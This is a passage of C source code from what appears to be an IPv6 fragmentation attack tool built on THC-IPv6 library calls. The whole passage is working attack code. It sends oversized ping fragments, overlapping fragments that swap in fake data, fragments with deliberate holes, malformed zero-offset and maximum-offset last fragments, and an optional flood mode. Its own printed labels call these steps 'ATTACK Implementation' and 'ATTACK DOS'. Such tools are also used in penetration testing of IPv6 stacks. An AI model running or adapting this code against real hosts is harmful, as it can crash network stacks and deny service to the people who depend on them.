offset, hdr->pkt_len - 40 - offset, 1232); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { memset(lbuf, only % 256, sizeof(lbuf)); if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - sending 65495 bytes in 54 fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending 54 fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &lbuf, 65495, 0); thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore hdr = (thc_ipv6_hdr *) pkt3; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1232); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { memset(lbuf, 
only % 256, sizeof(lbuf)); if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - sending 65535 bytes in 54 fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending 54 fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &lbuf, 65535, 0); thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore hdr = (thc_ipv6_hdr *) pkt3; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1232); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { memset(lbuf, only % 256, sizeof(lbuf)); if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - sending 66920 bytes in 47 fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending 47 fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &lbuf, 66920, 0); thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore hdr = (thc_ipv6_hdr *) pkt3; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1438 - offset); // ignore return code if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - replacing fragments with new, different data\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, 
src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment with fake data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with real data and ttl=64\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, 
NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - replacing fragments with new, different data\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with real data and ttl=64\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending second fragment with fake data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; 
thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - sending only first fragment\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - sending only second fragment\n", count); if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 1051, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, 
hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - sending only last fragment\n", count); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 7501, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - sending first, middle and final frag with 1k holes in between\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; 
if (thc_add_hdr_fragment(pkt3, &pkt_len3, 175, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 175)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 350, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - sending first, middle and final frag with 4k holes in between\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 550, 1, 0xfacebabe + 
getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 175)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 1110, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - sending first, middle and final frag with 16k holes in between\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 2050, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + 
offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 175)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 4100, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - one shot fragment without content\n", count); if (flood == 0 || curr == 0) printf(" Sending one-shot fragment with 0 byte TCP data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_TCP, buf, 0)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - one shot fragment with 1 byte content\n", count); if (flood == 0 || curr == 0) printf(" Sending one-shot fragment with 1 byte TCP data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if 
(thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_TCP, buf, 1)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment has offset 0 and no data\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment with offset 0\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, 
&pkt_len3, NXT_ICMP6, buf, 0)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment has offset 0\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment with offset 0\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 1); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1)) return -1; thc_generate_and_send_pkt(interface, srcmac, 
dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment has offset 1\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment with offset 1\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 1, 0, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 8, 1); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if 
(only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment at 8191 + 7 bytes\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); // memset(buf, 'A', sizeof(buf)); if (flood == 0 || curr == 0) printf(" Sending fragments 2-46\n"); for (i = 0; i < 45; i++) { pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + i * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1416)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore } if (flood == 0 || curr == 0) printf(" Sending fragment %d (preparation fragment)\n", i + 2); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + 45 * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, (8190 - (51 + 45 * 177)) * 8)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending final fragment with 8191 and sending 7 bytes\n"); 
pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 8191, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 7)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK DOS %d - last fragment at 8191 + 8 bytes\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, ++tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0xfacebabe + getpid() + count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); memset(buf, 'A', sizeof(buf)); if (flood == 0 || curr == 0) printf(" Sending fragments 2-46\n"); for (i = 0; i < 45; i++) { pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == 